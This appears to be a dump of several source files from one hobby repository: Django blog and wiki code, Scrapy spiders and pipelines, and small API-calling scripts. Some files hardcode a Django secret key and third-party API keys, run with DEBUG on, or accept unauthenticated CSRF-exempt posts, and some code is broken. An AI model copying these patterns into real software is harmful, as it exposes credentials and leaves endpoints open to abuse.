_blog_list = Article.objects.values("id", "title", "date_time").order_by('-date_time')
archive_dict = {}
for blog in _blog_list:
pub_month = blog.get("date_time").strftime("%Y年%m月")
if pub_month in archive_dict:
archive_dict[pub_month].append(blog)
else:
archive_dict[pub_month] = [blog]
data = sorted([{"date": _[0], "blogs": _[1]} for _ in archive_dict.items()], key=lambda item: item["date"],
reverse=True)
return render(request, 'blog/archive.html', {"data": data})
def message(request):
return render(request, 'blog/message_board.html', {"source_id": "message"})
@csrf_exempt
def get_comment(request):
"""
接收畅言的评论回推, post方式回推
:param request:
:return:
"""
arg = request.POST
data = arg.get('data')
data = json.loads(data)
title = data.get('title')
url = data.get('url')
source_id = data.get('sourceid')
if source_id not in ['message']:
article = Article.objects.get(pk=source_id)
article.commenced()
comments = data.get('comments')[0]
content = comments.get('content')
user = comments.get('user').get('nickname')
Comment(title=title, source_id=source_id, user_name=user, url=url, comment=content).save()
return JsonResponse({"status": "ok"})
def detail(request, pk):
"""
博文详情
:param request:
:param pk:
:return:
"""
blog = get_object_or_404(Article, pk=pk)
blog.viewed()
return render(request, 'blog/detail.html', {"blog": blog})
def search(request):
"""
搜索
:param request:
:return:
"""
key = request.GET['key']
page_number = get_page(request)
blog_count = Article.objects.filter(title__icontains=key).count()
page_info = PageInfo(page_number, blog_count)
_blog_list = Article.objects.filter(title__icontains=key)[page_info.index_start: page_info.index_end]
return render(request, 'blog/search.html', {"blog_list": _blog_list, "pages": page_info, "key": key})
def page_not_found_error(request, exception):
return render(request, "404.html", status=404)
def page_error(request):
return render(request, "404.html", status=500)
|
Python
| 144
| 29.847221
| 111
|
/awssam/django-blog/src/blog/views.py
| 0.61819
| 0.612112
|
mrpal39/ev_code
|
refs/heads/master
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from django.urls import reverse
import logging
from abc import ABCMeta, abstractmethod, abstractproperty
from django.db import models
from django.urls import reverse
from django.conf import settings
from uuslug import slugify
from django.core.exceptions import ValidationError
from django.utils.translation import gettext_lazy as _
from webdev.utils import get_current_site
from webdev.utils import cache_decorator, cache
from django.utils.timezone import now
from mdeditor . fields import MDTextField
#
logger = logging.getLogger(__name__)
class LinkShowType(models.TextChoices):
I=('i','Homepage' )
L=('l','list page' )
P=('p','article page' )
A=('a','full station' )
S=('s','Friendly Link Page' )
class BaseModel(models.Model):
id = models.AutoField(primary_key=True)
created_time = models.DateTimeField( 'Creation Time' , default = now )
last_mod_time = models.DateTimeField( 'modification time' , default = now )
def save(self, *args, **kwargs):
is_update_views = isinstance(
self,
Article) and 'update_fields' in kwargs and kwargs['update_fields'] == ['views']
if is_update_views:
Article.objects.filter(pk=self.pk).update(views=self.views)
else:
if 'slug' in self.__dict__:
slug = getattr(
self, 'title') if 'title' in self.__dict__ else getattr(
self, 'name')
setattr(self, 'slug', slugify(slug))
super().save(*args, **kwargs)
def get_full_url(self):
site = get_current_site().domain
url = "https://{site}{path}".format(site=site,
path=self.get_absolute_url())
return url
class Meta:
abstract = True
@abstractmethod
def get_absolute_url(self):
pass
class Article(BaseModel):
"""文章"""
STATUS_CHOICES = (
( 'd' , 'draft' ),
( 'p' , 'publish' ),
)
COMMENT_STATUS = (
( 'o' , 'open' ),
( 'c' , 'close' ),
)
TYPE = (
( 'a' , 'article' ),
( 'p' , 'page' ),
)
title = models.CharField('title', max_length=200, unique=True)
body = MDTextField('body')
pub_time = models.DateTimeField(
'Release time', blank=False, null=False, default=now)
status = models.CharField(
'Article status',
max_length=1,
choices=STATUS_CHOICES,
default='p')
comment_status = models.CharField(
' Comment Status' ,
max_length=1,
choices=COMMENT_STATUS,
default='o')
type = models . CharField ( '类型' , max_length = 1 , choices = TYPE , default = 'a' )
views = models . PositiveIntegerField ( 'Views' , default = 0 )
author = models . ForeignKey (
settings . AUTH_USER_MODEL ,
verbose_name = 'Author' ,
blank = False ,
null = False ,
on_delete = models . CASCADE )
article_order = models . IntegerField (
'Sorting, the larger the number, the more advanced' , blank = False , null = False , default = 0 )
category = models . ForeignKey (
'Category' ,
verbose_name = 'Classification' ,
on_delete = models . CASCADE ,
blank = False ,
null = False )
tags = models . ManyToManyField ( 'Tag' , verbose_name = 'tag collection' , blank = True )
def body_to_string ( self ):
return self . body
def __str__ ( self ):
return self . title
class Meta :
ordering = [ '-article_order' , '-pub_time' ]
verbose_name = "article"
verbose_name_plural = verbose_name
get_latest_by = 'id'
def get_absolute_url ( self ):
return reverse ( 'blog:detailbyid' , kwargs = {
'article_id' : self . id ,
'year' : self . created_time . year ,
'month' : self . created_time . month ,
'day' : self . created_time . day
})
@cache_decorator(60 * 60 * 10)
def get_category_tree(self):
tree = self.category.get_category_tree()
names = list(map(lambda c: (c.name, c.get_absolute_url()), tree))
return names
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
def viewed(self):
self.views += 1
self.save(update_fields=['views'])
def comment_list(self):
cache_key = 'article_comments_{id}'.format(id=self.id)
value = cache.get(cache_key)
if value:
logger.info('get article comments:{id}'.format(id=self.id))
return value
else:
comments = self.comment_set.filter(is_enable=True)
cache.set(cache_key, comments, 60 * 100)
logger.info('set article comments:{id}'.format(id=self.id))
return comments
def get_admin_url(self):
info = (self._meta.app_label, self._meta.model_name)
return reverse('admin:%s_%s_change' % info, args=(self.pk,))
@cache_decorator(expiration=60 * 100)
def next_article(self):
# 下一篇
return Article.objects.filter(
id__gt=self.id, status='p').order_by('id').first()
@cache_decorator(expiration=60 * 100)
def prev_article(self):
# 前一篇
return Article.objects.filter(id__lt=self.id, status='p').first()
class Category( BaseModel ):
"""Article Classification"""
name = models . CharField ( 'Category name' , max_length = 30 , unique = True )
parent_category = models . ForeignKey (
'self' ,
verbose_name = "Parent Category" ,
blank = True ,
null = True ,
on_delete = models . CASCADE )
slug = models . SlugField ( default = 'no-slug' , max_length = 60 , blank = True )
class Meta :
ordering = [ 'name' ]
verbose_name = "Category"
verbose_name_plural = verbose_name
def get_absolute_url ( self ):
return reverse (
'blog:category_detail' , kwargs = {
'category_name' : self . slug })
def __str__ ( self ):
return self . name
@cache_decorator(60 * 60 * 10)
def get_category_tree(self):
"""
递归获得分类目录的父级
:return:
"""
categorys = []
def parse(category):
categorys.append(category)
if category.parent_category:
parse(category.parent_category)
parse(self)
return categorys
@cache_decorator(60 * 60 * 10)
def get_sub_categorys(self):
"""
获得当前分类目录所有子集
:return:
"""
categorys = []
all_categorys = Category.objects.all()
def parse(category):
if category not in categorys:
categorys.append(category)
childs = all_categorys.filter(parent_category=category)
for child in childs:
if category not in categorys:
categorys.append(child)
parse(child)
parse(self)
return categorys
class Tag( BaseModel ):
"""Article Tags"""
name = models . CharField ( 'Labelname ' , max_length = 30 , unique = True )
slug = models . SlugField ( default = 'no-slug' , max_length = 60 , blank = True )
def __str__ ( self ):
return self . name
def get_absolute_url ( self ):
return reverse ( 'blog:tag_detail' , kwargs = { 'tag_name' : self . slug })
@ cache_decorator ( 60 * 60 * 10 )
def get_article_count ( self ):
return Article . objects . filter ( tags__name = self . name ). distinct (). count ()
class Meta :
ordering = [ 'name' ]
verbose_name = "label"
verbose_name_plural = verbose_name
class Links( models.Model ):
"""Links"""
name = models . CharField ( 'Link name' , max_length = 30 , unique = True )
link = models . URLField ( 'Link address' )
sequence = models . IntegerField ( '排序' , unique = True )
is_enable = models . BooleanField (
'Whether to display' , default = True , blank = False , null = False )
show_type = models . CharField (
'Display Type' ,
max_length = 1 ,
choices = LinkShowType . choices ,
default = LinkShowType . I )
created_time = models . DateTimeField ( 'Creation Time' , default = now )
last_mod_time = models . DateTimeField ( 'modification time' , default = now )
class Meta :
ordering = [ 'sequence' ]
verbose_name = 'Friendly link'
verbose_name_plural = verbose_name
def __str__ ( self ):
return self . name
class SideBar ( models . Model ):
"""The sidebar can display some html content"""
name = models . CharField ( 'title' , max_length = 100 )
content = models . TextField ( "content" )
sequence = models . IntegerField ( '排序' , unique = True )
is_enable = models . BooleanField ( 'Whether to enable' , default = True )
created_time = models . DateTimeField ( 'Creation Time' , default = now )
last_mod_time = models . DateTimeField ( 'modification time' , default = now )
class Meta :
ordering = [ 'sequence' ]
verbose_name = 'Sidebar'
verbose_name_plural = verbose_name
def __str__ ( self ):
return self . name
class BlogSettings ( models . Model ):
'''Site Settings'''
sitename = models . CharField (
"Site Name" ,
max_length = 200 ,
null = False ,
blank = False ,
default = '' )
site_description = models . TextField (
"Site Description" ,
max_length = 1000 ,
null = False ,
blank = False ,
default = '' )
site_seo_description = models . TextField (
"SEO description of the site" , max_length = 1000 , null = False , blank = False , default = '' )
site_keywords = models . TextField (
"Website Keywords" ,
max_length = 1000 ,
null = False ,
blank = False ,
default = '' )
article_sub_length = models . IntegerField ( "Article summary length" , default = 300 )
sidebar_article_count = models . IntegerField ( "The number of sidebar articles" , default = 10 )
sidebar_comment_count = models . IntegerField ( "The number of sidebar comments" , default = 5 )
show_google_adsense = models . BooleanField ( 'Whether to display Google ads' , default = False )
google_adsense_codes = models . TextField (
'Ad content' , max_length = 2000 , null = True , blank = True , default = '' )
open_site_comment = models . BooleanField ( 'Whether to open website comment function' , default = True )
beiancode = models . CharField (
'Record number' ,
max_length = 2000 ,
null = True ,
blank = True ,
default = '' )
analyticscode = models . TextField (
"Website Statistics Code" ,
max_length = 1000 ,
null = False ,
blank = False ,
default = '' )
show_gongan_code = models . BooleanField (
'Whether to display the public security record number' , default = False , null = False )
gongan_beiancode = models . TextField (
'Public Security Record Number' ,
max_length = 2000 ,
null = True ,
blank = True ,
default = '' )
resource_path = models . CharField (
"Static file storage address" ,
max_length = 300 ,
null = False ,
default = '/var/www/resource/' )
class Meta:
verbose_name = 'Websiteconfiguration'
verbose_name_plural = verbose_name
def __str__(self):
return self.sitename
def clean(self):
if BlogSettings.objects.exclude(id=self.id).count():
raise ValidationError(_('There can only be one configuration'))
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
from webdev.utils import cache
cache.clear()
class PublishedManager(models.Manager):
def get_queryset(self):
return super(PublishedManager,
self).get_queryset()\
.filter(status='published')
class Post(models.Model):
tags = TaggableManager()
objects = models.Manager() # The default manager.
published = PublishedManager() # Our custom manager.
STATUS_CHOICES = (
('draft', 'Draft'),
('published', 'Published'),
)
title = models.CharField(max_length=250)
slug = models.SlugField(max_length=250,
unique_for_date='publish')
author = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name='blog_posts')
body = models.TextField()
publish = models.DateTimeField(default=timezone.now)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
status = models.CharField(max_length=10,
choices=STATUS_CHOICES,
default='draft')
class Meta:
ordering = ('-publish',)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk': self.pk})
|
Python
| 407
| 32.624077
| 112
|
/myapi/fullfeblog/blog/models.py
| 0.559664
| 0.551626
|
mrpal39/ev_code
|
refs/heads/master
|
import os
from django.urls import reverse_lazy
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'vsfygxju9)=k8qxmc9!__ng%dooyn-w7il_z+w)grvkz4ks!)u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.humanize.apps.HumanizeConfig",
"django.contrib.auth.apps.AuthConfig",
"django.contrib.contenttypes.apps.ContentTypesConfig",
"django.contrib.sessions.apps.SessionsConfig",
"django.contrib.sites.apps.SitesConfig",
"django.contrib.messages.apps.MessagesConfig",
"django.contrib.staticfiles.apps.StaticFilesConfig",
"django.contrib.admin.apps.AdminConfig",
"django.contrib.admindocs.apps.AdminDocsConfig",
"sekizai",
"sorl.thumbnail",
"django_nyt.apps.DjangoNytConfig",
"wiki.apps.WikiConfig",
"wiki.plugins.macros.apps.MacrosConfig",
"wiki.plugins.help.apps.HelpConfig",
"wiki.plugins.links.apps.LinksConfig",
"wiki.plugins.images.apps.ImagesConfig",
"wiki.plugins.attachments.apps.AttachmentsConfig",
"wiki.plugins.notifications.apps.NotificationsConfig",
"wiki.plugins.editsection.apps.EditSectionConfig",
"wiki.plugins.globalhistory.apps.GlobalHistoryConfig",
"mptt",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
]
SITE_ID=1
ROOT_URLCONF = 'wikidj.urls'
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [
os.path.join(BASE_DIR, "templates"),
],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.request",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"sekizai.context_processors.sekizai",
],
"debug": DEBUG,
},
},
]
WSGI_APPLICATION = 'wikidj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(BASE_DIR, "static")
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
MEDIA_URL = "/media/"
WIKI_ANONYMOUS_WRITE = True
WIKI_ANONYMOUS_CREATE = False
LOGIN_REDIRECT_URL = reverse_lazy('wiki:get', kwargs={'path': ''})
# urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
Python
| 140
| 27.185715
| 91
|
/awssam/wikidj/wikidj/settings.py
| 0.68145
| 0.676635
|
mrpal39/ev_code
|
refs/heads/master
|
from django.db import models
from blog.models import Post
# Creating a comment systems
class Comment(models.Model):
post = models.ForeignKey(Post,
on_delete=models.CASCADE,
related_name='comments')
name=models.CharField(max_length=200)
email=models.EmailField()
body=models.TextField()
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now_add=True)
active=models.BooleanField(default=True)
class Meta:
ordering=('created',)
def __str__(self):
return f'comment by {self.name}on{self.post}'
|
Python
| 19
| 31.31579
| 53
|
/awssam/fullfeblog/core/models.py
| 0.661316
| 0.656501
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from mongoengine import *
from django.db import models
# Create your models here.
class ItemInfo(Document):
# 帖子名称
title = StringField()
# 租金
money = StringField()
# 租赁方式
method = StringField()
# 所在区域
area = StringField()
# 所在小区
community = StringField()
# 帖子详情url
targeturl = StringField()
# 帖子发布时间
pub_time = StringField()
# 所在城市
city = StringField()
phone = StringField()
img1= StringField()
img2 = StringField()
#指定是数据表格
meta={'collection':'zufang_detail'}
|
Python
| 28
| 20.785715
| 39
|
/tc_zufang/django_web/datashow/models.py
| 0.619672
| 0.614754
|
mrpal39/ev_code
|
refs/heads/master
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.api, name='api'),
path('t/', views.simple_upload, name='test'),
]
|
Python
| 10
| 15.2
| 49
|
/myapi/devfile/gitapi/urls.py
| 0.611111
| 0.611111
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
#定义需要抓取存进数据库的字段
from scrapy.item import Item,Field
class TcZufangItem(Item):
#帖子名称
title=Field()
#租金
money=Field()
#租赁方式
method=Field()
#所在区域
area=Field()
#所在小区
community=Field()
#帖子详情url
targeturl=Field()
#帖子发布时间
pub_time=Field()
#所在城市
city=Field()
# 联系电话
phone= Field()
# 图片1
img1 = Field()
# 图片2
img2 = Field()
|
Python
| 26
| 15.384615
| 34
|
/tc_zufang/tc_zufang-slave/tc_zufang/items.py
| 0.550117
| 0.538462
|
mrpal39/ev_code
|
refs/heads/master
|
from scrapy.loader.processors import MapCompose, Join
from scrapy.loader import ItemLoader
from properties.items import PropertiesItem
import datetime
from urllib.parse import urlparse
import socket
import scrapy
class BasicSpider(scrapy.Spider):
name = "basictest"
allowed_domains = ["web"]
start_urls=(
'https://developers.facebook.com/blog/post/2021/01/26/introducing-instagram-content-publishing-api/?utm_source=email&utm_medium=fb4d-newsletter-february21&utm_campaign=organic&utm_offering=business-tools&utm_product=instagram&utm_content=body-button-instagram-graph-API&utm_location=2',
)
def parse (self,response):
""" @url https://developers.facebook.com/blog/post/2021/01/26/introducing-instagram-content-publishing-api/?utm_source=email&utm_medium=fb4d-newsletter-february21&utm_campaign=organic&utm_offering=business-tools&utm_product=instagram&utm_content=body-button-instagram-graph-API&utm_location=2
@return item 1
@scrapes title price
@scrapes url project"""
l = ItemLoader(item=PropertiesItem(), response=response)
# Load fields using XPath expressions
l.add_xpath('title', '/html/body/div[1]/div[5]/div[2]/div/div/div/div[2]/div[2]/div[2]/div[1]/div/div/div[2]/div/div/p[1]/text()',
MapCompose(unicode.strip, unicode.title))
# l.add_xpath('price', './/*[@itemprop="price"][1]/text()',
# MapCompose(lambda i: i.replace(',', ''),
# float),
# re='[,.0-9]+')
# l.add_xpath('description', '//*[@itemprop="description"]'
# '[1]/text()',
# MapCompose(unicode.strip), Join())
# Housekeeping fields
l.add_value('url', response.url)
l.add_value('project', self.settings.get('BOT_NAME'))
l.add_value('spider', self.name)
l.add_value('server', socket.gethostname())
l.add_value('date', datetime.datetime.now())
return l.load_item()
|
Python
| 42
| 44.023811
| 299
|
/scrap/properties/properties/spiders/basictest.py
| 0.690476
| 0.67037
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import logging
# import MySQLdb
# import MySQLdb.cursors
import copy
import pymysql
from twisted.enterprise import adbapi
# class ArticlesPipeline(object):
# def process_item(self, item, spider):
# return item
class MysqlTwistedPipeline(object):
def __init__(self, dbpool):
self.dbpool = dbpool
@classmethod
def from_settings(cls, settings): # 函数名固定,会被scrapy调用,直接可用settings的值
"""
数据库建立连接
:param settings: 配置参数
:return: 实例化参数
"""
adbparams = dict(
host=settings['MYSQL_HOST'],
db=settings['MYSQL_DBNAME'],
user=settings['MYSQL_USER'],
password=settings['MYSQL_PASSWORD'],
cursorclass=pymysql.cursors.DictCursor # 指定cursor类型
)
# 连接数据池ConnectionPool,使用pymysql或者Mysqldb连接
dbpool = adbapi.ConnectionPool('pymysql', **adbparams)
# 返回实例化参数
return cls(dbpool)
def process_item(self, item, spider):
"""
使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
"""
# 防止入库速度过慢导致数据重复
item = copy.deepcopy(item)
query = self.dbpool.runInteraction(self.do_insert, item) # 指定操作方法和操作数据
# 添加异常处理
query.addCallback(self.handle_error) # 处理异常
def do_insert(self, cursor, item):
# 对数据库进行插入操作,并不需要commit,twisted会自动commit
insert_sql = """
insert into pm_article(title, create_date, url, content, view, tag, url_id) VALUES (%s, %s, %s, %s, %s, %s, %s)
"""
cursor.execute(insert_sql, (item['title'], item['create_date'], item['url'],
item['content'], item['view'], item['tag'], item['url_id']))
def handle_error(self, failure):
if failure:
# 打印错误信息
print(failure)
class ElasticsearchPipeline(object):
# 将数据写入到es中
def process_item(self, item, spider):
# 将item转换为es的数据
item.save_to_es()
return item
|
Python
| 75
| 27.933332
| 117
|
/eswork/articles/articles/pipelines.py
| 0.605069
| 0.604608
|
mrpal39/ev_code
|
refs/heads/master
|
# import requests
# url = "https://proxy-orbit1.p.rapidapi.com/v1/"
# headers = {
# 'x-rapidapi-key': "b188eee73cmsha4c027c9ee4e2b7p1755ebjsn1e0e0b615bcf",
# 'x-rapidapi-host': "proxy-orbit1.p.rapidapi.com"
# }
# # response = requests.request("GET", url, headers=headers)
# print(response.text)
import requests
url= "https://libraries.io/api/"
headers={'?api_key':'306cf1684a42e4be5ec0a1c60362c2ef',
# 'platform':'NPM/base62/dependent_repositories'
}
response = requests.request("GET", url, headers=headers)
print(response.text)
Example: https://libraries.io/api/NPM/base62/dependent_repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef
import requests
url = "https://scrapingant.p.rapidapi.com/post"
payload = "{\"cookies\": \"cookie_name_1=cookie_value_1;cookie_name_2=cookie_value_2\"\"return_text\": false,\"url\": \"https://example.com\"}"
headers = {
'content-type': "application/json",
'x-rapidapi-key': "b188eee73cmsha4c027c9ee4e2b7p1755ebjsn1e0e0b615bcf",
'x-rapidapi-host': "scrapingant.p.rapidapi.com"
}
response = requests.request("POST", url, data=payload, headers=headers)
print(response.text)
|
Python
| 47
| 23.659575
| 143
|
/myapi/devfile/request/api.py
| 0.714901
| 0.633075
|
mrpal39/ev_code
|
refs/heads/master
|
from django.urls import path
from . import views
from django.conf.urls import include, url
from django.views import generic
from material.frontend import urls as frontend_urls
urlpatterns = [
path('', views.home, name='home'),
path('$/', generic.RedirectView.as_view(url='/workflow/', permanent=False)),
path('/', include(frontend_urls)),
]
# Viewflow PRO Feature Set
# Celery integration
# django-guardian integration
# Flow graph visualization
# Flow BPMN export
# Material Frontend
# Process dashboard view
# Flow migration support
# Subprocess support
# REST API support
|
Python
| 25
| 24.440001
| 80
|
/awssam/devfile/core/urls.py
| 0.690738
| 0.690738
|
mrpal39/ev_code
|
refs/heads/master
|
# You need to create an Item name 'played' for running this script
# item['ack_signal'] = int(response.meta['ack_signal']) - this line is used for sending ack signal to RabbitMQ
def parse(self, response):
item = played()
songs = response.xpath('//li[@class="player-in-playlist-holder"]')
indexr = response.url.find('date=')
indexr = indexr + 5
date = response.url[indexr:indexr + 10]
for song in songs:
item['timeplayed'] = song.xpath('.//span[@class="time"]/text()').extract()[0]
item['artist'] = song.xpath('.//div[@class="jp-title"]/strong//span//text()').extract()[0]
item['song'] = song.xpath('.//div[@class="jp-title"]/strong//em//text()').extract()[0]
item['dateplayed'] = date
item['ack_signal'] = int(response.meta['ack_signal'])
yield item
|
Python
| 16
| 50.4375
| 110
|
/Web-UI/examples/scraper.py
| 0.619221
| 0.611922
|
mrpal39/ev_code
|
refs/heads/master
|
# from __future__ import unicode_literals
# from django.utils.encoding import python_2_unicode_compatible
# from django.db import models
# from django.db.models.signals import pre_delete
# from django.dispatch import receiver
# from scrapy_djangoitem import DjangoItem
# from dynamic_scraper.models import Scraper, SchedulerRuntime
# @python_2_unicode_compatible
# class NewsWebsite(models.Model):
# name = models.CharField(max_length=200)
# url = models.URLField()
# scraper = models.ForeignKey(Scraper, blank=True, null=True, on_delete=models.SET_NULL)
# scraper_runtime = models.ForeignKey(SchedulerRuntime, blank=True, null=True, on_delete=models.SET_NULL)
# def __str__(self):
# return self.name
# @python_2_unicode_compatible
# class Article(models.Model):
# title = models.CharField(max_length=200)
# news_website = models.ForeignKey(NewsWebsite)
# description = models.TextField(blank=True)
# url = models.URLField(blank=True)
# thumbnail = models.CharField(max_length=200, blank=True)
# checker_runtime = models.ForeignKey(SchedulerRuntime, blank=True, null=True, on_delete=models.SET_NULL)
# def __str__(self):
# return self.title
# class ArticleItem(DjangoItem):
# django_model = Article
# @receiver(pre_delete)
# def pre_delete_handler(sender, instance, using, **kwargs):
# if isinstance(instance, NewsWebsite):
# if instance.scraper_runtime:
# instance.scraper_runtime.delete()
# if isinstance(instance, Article):
# if instance.checker_runtime:
# instance.checker_runtime.delete()
# pre_delete.connect(pre_delete_handler)
|
Python
| 48
| 34.166668
| 109
|
/awssam/myscrapyproject/scrapyapi/srp/models.py
| 0.696503
| 0.689389
|
mrpal39/ev_code
|
refs/heads/master
|
from django.shortcuts import render
from .forms import SearchForm
import requests
def base(request):
# import requests
# # url = "https://gplaystore.p.rapidapi.com/newFreeApps"
# url="https://libraries.io/api/"
# querystring = {"platforms":"NPM/base62"}
# headers = {'x-rapidapi-key': "?api_key=306cf1684a42e4be5ec0a1c60362c2ef'" }
# response = requests.request("GET", url, headers=headers, params=querystring)
# print(response.text)
return render(request, 'base.html'
)
def home(request):
# Platforms=(' https://libraries.io/api/platforms?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
# Project=('https://libraries.io/api/NPM/base62?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
# url=requests()
# url='https://libraries.io/api/:platform/:name/dependent_repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# url=requests.get('https://libraries.io/api/github/librariesio/repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
url=requests.get('https://libraries.io/api/platforms?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
form=url.json()
return render(request, 'index.html',{
'form':form
}
)
def Search(request):
# form= SearchForm()
# query=None
# results=[]
# # if 'query' in requests.GET:
# # form=SearchForm(request.GET)
# # if form.is_valid():
# # query=form.cleaned_data['query']
# # results=Post.published.annotate(
# # search =SearchVector('title','body'),
# # ).filter(search=query)
r=requests.get('https://libraries.io/api/search?q=&api_key=306cf1684a42e4be5ec0a1c60362c2ef')
dr=r.json()
return render(request, 'Search.html',{
'search':dr
}
)
# def post_search(request):
# form= SearchForm()
# payload={'key1':'search?q=','key2':['form','&api_key=306cf1684a42e4be5ec0a1c60362c2ef']}
# url=requests.get=('https://libraries.io/api/get',params=payload)
# # results=[]
# # if 'query' in request.GET:
# # form=SearchForm(
# # if form.is_valid():
# # query=form.cleaned_data['query']
# # results=Post.published.annotate(
# # search =SearchVector('title','body'),
# # ).filter(search=query)
# return render(request,'search.html',{
# 'url':url,
# # 'query':query,
# # 'results':results
# })
|
Python
| 79
| 29.772152
| 123
|
/myapi/devfile/core/views.py
| 0.621677
| 0.557055
|
mrpal39/ev_code
|
refs/heads/master
|
from django.http import response
from django.shortcuts import render
from .forms import DocumentForm
import requests
from django.shortcuts import render
from django.conf import settings
from django.core.files.storage import FileSystemStorage
def simple_upload(request):
if request.method == 'POST':
myfile = DocumentForm(request.POST, request.FILES)
myfile = request.FILES['file']
fs = FileSystemStorage()
filename = fs.save(myfile.name, myfile)
uploaded_file_url = fs.url(filename)
return render(request, 'imple_upload.html', {
'uploaded_file_url': uploaded_file_url
})
return render(request, 'simple_upload.html')
def model_form_upload(request):
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('home')
else:
form = DocumentForm()
return render(request, 'core/model_form_upload.html', {
'form': form
})
def api(request):
api_key ='306cf1684a42e4be5ec0a1c60362c2ef'
name='npm'
api_url="https://libraries.io/api/search?q={}&api_key={}".format(name ,api_key)
response=requests.get(api_url)
response_dict = response.json()
return render(request, 'api.html',{'api': response_dict, }
)
# return render(request,'search.html',{
# 'url':url,
# # 'query':query,
# # 'results':results
# })
|
Python
| 67
| 21.328358
| 82
|
/myapi/devfile/gitapi/views.py
| 0.626915
| 0.614257
|
mrpal39/ev_code
|
refs/heads/master
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth import update_session_auth_hash
from .forms import CreateProject, DeleteProject, ItemName, FieldName, CreatePipeline, LinkGenerator, Scraper, Settings, ShareDB, ChangePass, ShareProject
from django.http import HttpResponseRedirect
from django.http import HttpResponse, HttpResponseNotFound, JsonResponse
from .models import Project, Item, Pipeline, Field, LinkgenDeploy, ScrapersDeploy, Dataset
from django.forms.util import ErrorList
from itertools import groupby
from django.core.urlresolvers import reverse
import os
import shutil
from string import Template
from .scrapy_packages import settings
from pymongo import MongoClient
import glob
import subprocess
import requests
import json
import datetime
import dateutil.parser
import socket
from django.contrib.auth.models import User
from bson.json_util import dumps
import threading
import crypt
try:
# Python 3
from urllib.parse import urlparse
except ImportError:
# Python 2
from urlparse import urlparse
try:
from urllib.parse import quote
except:
from urllib import quote
def generate_default_settings():
settings = """# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'unknown'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
